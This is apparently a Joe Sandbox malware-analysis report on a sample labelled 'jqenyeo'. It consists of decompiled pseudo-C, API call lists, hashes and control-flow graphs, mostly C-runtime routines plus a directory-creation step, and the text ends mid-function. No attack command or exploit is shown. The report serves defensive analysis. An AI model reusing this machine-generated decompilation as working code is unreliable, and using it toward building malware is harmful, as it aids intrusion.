                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bfaf7d691fa9146c0dd1e46dfb69890e0d8b3ea591259c748d953abd61492ac
                                                          • Instruction ID: 8406ee06771d3993390eae2bcca02a5905e42ded8ab89b9469d8ad81ad37edfe
                                                          • Opcode Fuzzy Hash: 6bfaf7d691fa9146c0dd1e46dfb69890e0d8b3ea591259c748d953abd61492ac
                                                          • Instruction Fuzzy Hash: 1AF12E25A5035CE9EB60CBE4EC11BFEB3B5AF88710F205497E60DEA290E7744AC0DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 331 9f199a-9f1a3a call 9f06f7 call 9f07a4 * 3 PathFileExistsW 341 9f1a3c-9f1a3f 331->341 342 9f1a43-9f1a4d CreateDirectoryW 331->342 343 9f1a58-9f1a59 341->343 344 9f1a4f-9f1a51 342->344 345 9f1a55-9f1a57 342->345 344->343 345->343
                                                          APIs
                                                          • PathFileExistsW.KERNELBASE(009F18E6,?,?,?,?,?,?,?,?,009F18E6,?), ref: 009F1A34
                                                          • CreateDirectoryW.KERNELBASE(009F18E6,00000000,?,?,?,?,?,?,?,?,009F18E6,?), ref: 009F1A48
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryExistsFilePath
                                                          • String ID:
                                                          • API String ID: 2624722123-0
                                                          • Opcode ID: 70c337b4972ae758220606cb3897d8e3870516a05c4c65832b66cc75de0d2e5a
                                                          • Instruction ID: 706cb113633784255a3aa859fb64c66fbd7ad62db4f2bd7808afd11f0a761cfe
                                                          • Opcode Fuzzy Hash: 70c337b4972ae758220606cb3897d8e3870516a05c4c65832b66cc75de0d2e5a
                                                          • Instruction Fuzzy Hash: 7F219625E6038CEADF50DBF4E811BBE77B5AF88710F205416E605FA2A0E7718E50D749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 346 40139c-4013b0 call 402520 349 4013b2-4013b5 346->349 350 4013e3 346->350 349->350 351 4013b7-4013bc 349->351 352 4013e5-4013ea call 402565 350->352 353 4013eb-401402 call 401a08 call 4011bc 351->353 354 4013be-4013c2 351->354 366 401407-40141d call 401425 353->366 357 4013d3-4013de call 4024c9 call 4017ee 354->357 358 4013c4-4013d0 call 401b60 354->358 357->350 358->357 366->352
                                                          C-Code - Quality: 89%
                                                          			E0040139C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				intOrPtr _t16;
                                                          				intOrPtr _t19;
                                                          				intOrPtr _t29;
                                                          				void* _t32;
                                                          
                                                          				_push(0xc);
                                                          				_push(0x411e60);
                                                          				E00402520(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                                                          				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                                                          					L6:
                                                          					_t16 = 0;
                                                          				} else {
                                                          					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                                                          					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                                                          						E00401A08(_t31);
                                                          						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                          						_t19 = E004011BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                                                          						_t29 = _t19;
                                                          						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                                                          						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                          						E00401425(_t31);
                                                          						_t16 = _t29;
                                                          					} else {
                                                          						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                                                          							E00401B60( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                                                          						}
                                                          						 *((intOrPtr*)(E004024C9())) = 0x16;
                                                          						E004017EE();
                                                          						goto L6;
                                                          					}
                                                          				}
                                                          				return E00402565(_t16);
                                                          			}







                                                          0x0040139c
                                                          0x0040139e
                                                          0x004013a3
                                                          0x004013aa
                                                          0x004013b0
                                                          0x004013e3
                                                          0x004013e3
                                                          0x004013b7
                                                          0x004013b7
                                                          0x004013bc
                                                          0x004013ec
                                                          0x004013f2
                                                          0x00401402
                                                          0x0040140a
                                                          0x0040140c
                                                          0x0040140f
                                                          0x00401416
                                                          0x0040141b
                                                          0x004013be
                                                          0x004013c2
                                                          0x004013cb
                                                          0x004013d0
                                                          0x004013d8
                                                          0x004013de
                                                          0x00000000
                                                          0x004013de
                                                          0x004013bc
                                                          0x004013ea

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: e962d0ee91949d81dec31b13fab030e3cfb988c54088bcc417ff86c600293a5c
                                                          • Instruction ID: 08638ded225e420fee8fbc02ae57d48bf2a2d170e3452f6154abbae9cebcad27
                                                          • Opcode Fuzzy Hash: e962d0ee91949d81dec31b13fab030e3cfb988c54088bcc417ff86c600293a5c
                                                          • Instruction Fuzzy Hash: 20017131C00208EADF12AFA69C4599F7AB1AF40364F14423BF8147A1F1D77D8A51DB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 439 40142d-401441 call 401442
                                                          C-Code - Quality: 25%
                                                          			E0040142D(intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __ebp;
                                                          				void* _t3;
                                                          				void* _t4;
                                                          				void* _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t10;
                                                          
                                                          				_push(0x40);
                                                          				_push(_a8);
                                                          				_push(_a4);
                                                          				_t3 = E00401442(_t4, _t5, _t6, _t7, _t10); // executed
                                                          				return _t3;
                                                          			}










                                                          0x00401430
                                                          0x00401432
                                                          0x00401435
                                                          0x00401438
                                                          0x00401441

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: f6e2920786bbec203282cdfb6f3b3633442830df4e5952b23224e3e68bcd5e43
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: B5B0927244020C77CE012E82EC02E593B199B507A8F008021FB0C281B1E6BBE660968A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040410F(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				return UnhandledExceptionFilter(_a4);
                                                          			}



                                                          0x00404114
                                                          0x00404124

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040178F,?,?,?,00000000), ref: 00404114
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040411D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: dcb4722f0a632642793ad9d39d4fc1cf06e90c55a74e0595ad635aa03cc3fe3f
                                                          • Instruction ID: 067b22139976b5875a2864e037a45bb3fb438998543bb6df764df44ff1f2647d
                                                          • Opcode Fuzzy Hash: dcb4722f0a632642793ad9d39d4fc1cf06e90c55a74e0595ad635aa03cc3fe3f
                                                          • Instruction Fuzzy Hash: B9B09231044218ABDA402B92EE09B883F2EFB04662F004420F60D540B19BB255608AAB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004040DE(_Unknown_base(*)()* _a4) {
                                                          
                                                          				return SetUnhandledExceptionFilter(_a4);
                                                          			}



                                                          0x004040eb

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?,?,00402C7D,00402C32), ref: 004040E4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 36f934ef4b296aaa1d3dbf936b85faf584bf2989de826da29e1899fba37ab72f
                                                          • Instruction ID: 38e814d130715ca93d8304d701d29e9a64e1d58cdd9c4f0632652ad50e209764
                                                          • Opcode Fuzzy Hash: 36f934ef4b296aaa1d3dbf936b85faf584bf2989de826da29e1899fba37ab72f
                                                          • Instruction Fuzzy Hash: B4A0113000020CABCA002B82EE088883F2EEA002A0B000020FA0C00022ABB2AA208A8A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
                                                          • Instruction ID: c08a670591b423fb0668b83f77dad73436d9c64cdf53dfa847cc4f2c509bfd4b
                                                          • Opcode Fuzzy Hash: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
                                                          • Instruction Fuzzy Hash: E5218E36A00218AFCB10DFA9C880ABDF7F9EFD8354B14856AE542D3362E674DE00DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
                                                          • Instruction ID: 4effd3b9929ab6c9d5bbf5b386bcf97db34c8b71430626d3821080e6f3d07889
                                                          • Opcode Fuzzy Hash: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
                                                          • Instruction Fuzzy Hash: 47E01A3576064A9FCB04DBB8C981D59B3E8EB88368B144294F916C73E2EA74FD00DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
                                                          • Instruction ID: 9b060d8ac9de81677a5f582fc5932a61a97bf4598bbe49953539e67a5e8c3cd0
                                                          • Opcode Fuzzy Hash: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
                                                          • Instruction Fuzzy Hash: BDE086363105148BD720EA19C880967F3EDEBC83B071548A9EA4AD3712C230FC008B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00408702(intOrPtr _a4) {
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				void* _t66;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t54 = _a4;
                                                          				if(_t54 != 0) {
                                                          					_t2 = _t54 + 0xc; // 0xf000000
                                                          					_t56 =  *_t2 -  *0x413e34; // 0x415054
                                                          					if(_t56 != 0) {
                                                          						E00404535(_t16);
                                                          					}
                                                          					_t3 = _t54 + 0x10; // 0x254804b7
                                                          					_t57 =  *_t3 -  *0x413e38; // 0x415054
                                                          					if(_t57 != 0) {
                                                          						E00404535(_t17);
                                                          					}
                                                          					_t4 = _t54 + 0x14; // 0x8000
                                                          					_t58 =  *_t4 -  *0x413e3c; // 0x415054
                                                          					if(_t58 != 0) {
                                                          						E00404535(_t18);
                                                          					}
                                                          					_t5 = _t54 + 0x18; // 0xfc7d80
                                                          					_t59 =  *_t5 -  *0x413e40; // 0x415054
                                                          					if(_t59 != 0) {
                                                          						E00404535(_t19);
                                                          					}
                                                          					_t6 = _t54 + 0x1c; // 0x4d8b0774
                                                          					_t60 =  *_t6 -  *0x413e44; // 0x415054
                                                          					if(_t60 != 0) {
                                                          						E00404535(_t20);
                                                          					}
                                                          					_t7 = _t54 + 0x20; // 0x706183f8
                                                          					_t61 =  *_t7 -  *0x413e48; // 0x415054
                                                          					if(_t61 != 0) {
                                                          						E00404535(_t21);
                                                          					}
                                                          					_t8 = _t54 + 0x24; // 0x5de58bfd
                                                          					_t62 =  *_t8 -  *0x413e4c; // 0x415054
                                                          					if(_t62 != 0) {
                                                          						E00404535(_t22);
                                                          					}
                                                          					_t9 = _t54 + 0x38; // 0x8b55c35d
                                                          					_t63 =  *_t9 -  *0x413e60; // 0x415058
                                                          					if(_t63 != 0) {
                                                          						E00404535(_t23);
                                                          					}
                                                          					_t10 = _t54 + 0x3c; // 0x10ec83ec
                                                          					_t64 =  *_t10 -  *0x413e64; // 0x415058
                                                          					if(_t64 != 0) {
                                                          						E00404535(_t24);
                                                          					}
                                                          					_t11 = _t54 + 0x40; // 0x758b5653
                                                          					_t65 =  *_t11 -  *0x413e68; // 0x415058
                                                          					if(_t65 != 0) {
                                                          						E00404535(_t25);
                                                          					}
                                                          					_t12 = _t54 + 0x44; // 0x74f6850c
                                                          					_t66 =  *_t12 -  *0x413e6c; // 0x415058
                                                          					if(_t66 != 0) {
                                                          						E00404535(_t26);
                                                          					}
                                                          					_t13 = _t54 + 0x48; // 0x105d8b18
                                                          					_t67 =  *_t13 -  *0x413e70; // 0x415058
                                                          					if(_t67 != 0) {
                                                          						E00404535(_t27);
                                                          					}
                                                          					_t14 = _t54 + 0x4c; // 0x1174db85
                                                          					_t15 =  *_t14;
                                                          					_t68 = _t15 -  *0x413e74; // 0x415058
                                                          					if(_t68 != 0) {
                                                          						return E00404535(_t15);
                                                          					}
                                                          				}
                                                          				return _t15;
                                                          			}


















                                                          0x00408706
                                                          0x0040870b
                                                          0x00408711
                                                          0x00408714
                                                          0x0040871a
                                                          0x0040871d
                                                          0x00408722
                                                          0x00408723
                                                          0x00408726
                                                          0x0040872c
                                                          0x0040872f
                                                          0x00408734
                                                          0x00408735
                                                          0x00408738
                                                          0x0040873e
                                                          0x00408741
                                                          0x00408746
                                                          0x00408747
                                                          0x0040874a
                                                          0x00408750
                                                          0x00408753
                                                          0x00408758
                                                          0x00408759
                                                          0x0040875c
                                                          0x00408762
                                                          0x00408765
                                                          0x0040876a
                                                          0x0040876b
                                                          0x0040876e
                                                          0x00408774
                                                          0x00408777
                                                          0x0040877c
                                                          0x0040877d
                                                          0x00408780
                                                          0x00408786
                                                          0x00408789
                                                          0x0040878e
                                                          0x0040878f
                                                          0x00408792
                                                          0x00408798
                                                          0x0040879b
                                                          0x004087a0
                                                          0x004087a1
                                                          0x004087a4
                                                          0x004087aa
                                                          0x004087ad
                                                          0x004087b2
                                                          0x004087b3
                                                          0x004087b6
                                                          0x004087bc
                                                          0x004087bf
                                                          0x004087c4
                                                          0x004087c5
                                                          0x004087c8
                                                          0x004087ce
                                                          0x004087d1
                                                          0x004087d6
                                                          0x004087d7
                                                          0x004087da
                                                          0x004087e0
                                                          0x004087e3
                                                          0x004087e8
                                                          0x004087e9
                                                          0x004087e9
                                                          0x004087ec
                                                          0x004087f2
                                                          0x00000000
                                                          0x004087fa
                                                          0x004087f2
                                                          0x004087fd

                                                          APIs
                                                          • _free.LIBCMT ref: 0040871D
                                                            • Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
                                                            • Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B
                                                          • _free.LIBCMT ref: 0040872F
                                                          • _free.LIBCMT ref: 00408741
                                                          • _free.LIBCMT ref: 00408753
                                                          • _free.LIBCMT ref: 00408765
                                                          • _free.LIBCMT ref: 00408777
                                                          • _free.LIBCMT ref: 00408789
                                                          • _free.LIBCMT ref: 0040879B
                                                          • _free.LIBCMT ref: 004087AD
                                                          • _free.LIBCMT ref: 004087BF
                                                          • _free.LIBCMT ref: 004087D1
                                                          • _free.LIBCMT ref: 004087E3
                                                          • _free.LIBCMT ref: 004087F5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
                                                          • Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
                                                          • Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E0040304B(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* __esi;
                                                          				void* _t3;
                                                          				intOrPtr _t6;
                                                          				long _t14;
                                                          				long* _t27;
                                                          
                                                          				E004031FA(_t3);
                                                          				if(E004044E7() != 0) {
                                                          					_t6 = E00403D67(E00402DDC);
                                                          					 *0x413508 = _t6;
                                                          					__eflags = _t6 - 0xffffffff;
                                                          					if(_t6 == 0xffffffff) {
                                                          						goto L1;
                                                          					} else {
                                                          						_t27 = E0040456D(1, 0x3bc);
                                                          						__eflags = _t27;
                                                          						if(_t27 == 0) {
                                                          							L6:
                                                          							E004030C1();
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							__eflags = E00403DC3( *0x413508, _t27);
                                                          							if(__eflags == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(0);
                                                          								_push(_t27);
                                                          								E00402F98(__ebx, __edi, _t27, __eflags);
                                                          								_t14 = GetCurrentThreadId();
                                                          								_t27[1] = _t27[1] | 0xffffffff;
                                                          								 *_t27 = _t14;
                                                          								__eflags = 1;
                                                          								return 1;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					L1:
                                                          					E004030C1();
                                                          					return 0;
                                                          				}
                                                          			}








                                                          0x0040304b
                                                          0x00403057
                                                          0x00403066
                                                          0x0040306b
                                                          0x00403071
                                                          0x00403074
                                                          0x00000000
                                                          0x00403076
                                                          0x00403083
                                                          0x00403087
                                                          0x00403089
                                                          0x004030b8
                                                          0x004030b8
                                                          0x004030bd
                                                          0x004030c0
                                                          0x0040308b
                                                          0x00403099
                                                          0x0040309b
                                                          0x00000000
                                                          0x0040309d
                                                          0x0040309d
                                                          0x0040309f
                                                          0x004030a0
                                                          0x004030a7
                                                          0x004030ad
                                                          0x004030b1
                                                          0x004030b5
                                                          0x004030b7
                                                          0x004030b7
                                                          0x0040309b
                                                          0x00403089
                                                          0x00403059
                                                          0x00403059
                                                          0x00403059
                                                          0x00403060
                                                          0x00403060

                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 0040304B
                                                            • Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
                                                            • Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
                                                            • Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
                                                            • Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78
                                                          • __mtinitlocks.LIBCMT ref: 00403050
                                                          • __mtterm.LIBCMT ref: 00403059
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
                                                            • Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
                                                            • Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A
                                                          • __calloc_crt.LIBCMT ref: 0040307E
                                                          • __initptd.LIBCMT ref: 004030A0
                                                          • GetCurrentThreadId.KERNEL32 ref: 004030A7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
                                                          • Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
                                                          • Opcode Fuzzy Hash: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
                                                          • Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				signed int _t35;
                                                          				int _t38;
                                                          				signed int _t41;
                                                          				int _t42;
                                                          				intOrPtr* _t44;
                                                          				int _t47;
                                                          				short* _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				int _t55;
                                                          				signed int _t59;
                                                          				char* _t62;
                                                          
                                                          				_t62 = _a8;
                                                          				if(_t62 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t50 = _a12;
                                                          				if(_t50 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if( *_t62 != 0) {
                                                          					E00405DA9( &_v20, _a16);
                                                          					_t35 = _v20;
                                                          					__eflags =  *(_t35 + 0xa8);
                                                          					if( *(_t35 + 0xa8) != 0) {
                                                          						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							__eflags = _a4;
                                                          							_t41 = _v20;
                                                          							_t59 = 1;
                                                          							_t28 = _t41 + 4; // 0x840ffff8
                                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t42;
                                                          							if(_t42 != 0) {
                                                          								L21:
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
